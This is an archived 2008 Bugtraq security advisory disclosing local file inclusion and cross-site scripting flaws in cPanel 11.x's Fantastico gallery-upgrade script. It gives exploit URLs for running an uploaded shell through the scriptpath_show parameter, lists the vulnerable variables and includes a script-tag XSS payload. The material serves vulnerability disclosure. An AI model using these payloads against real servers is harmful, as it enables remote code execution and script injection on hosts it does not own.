[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Cpanel 11.x Local File Inclusion & Cross Site Scripting -
From: irancrash () gmail ! com
Date: 2008-10-31 13:03:55
Message-ID: 200810311303.m9VD3tiT017709 () www5 ! securityfocus ! com
[Download RAW message or body]
----------------------------------------------------------------
Script : Cpanel 11.x
Type : Local File Inclusion & Cross Site Scripting
Risk : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
**** I am 17 Years Old ****
My Official Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Local File Inclusion Vulnerability :
Note : Rename your shell to config.php and upload with your ftp account in ./ \
directory .... , now login in cpanel and enter vulnerable address in url ....
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
----------------------------------------------------------------
Cross site scripting :
File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4
Set Action as Upgrade%20to%201.7.4
Vulnerable Variables :
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion
For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryup \
grade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
----------------------------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic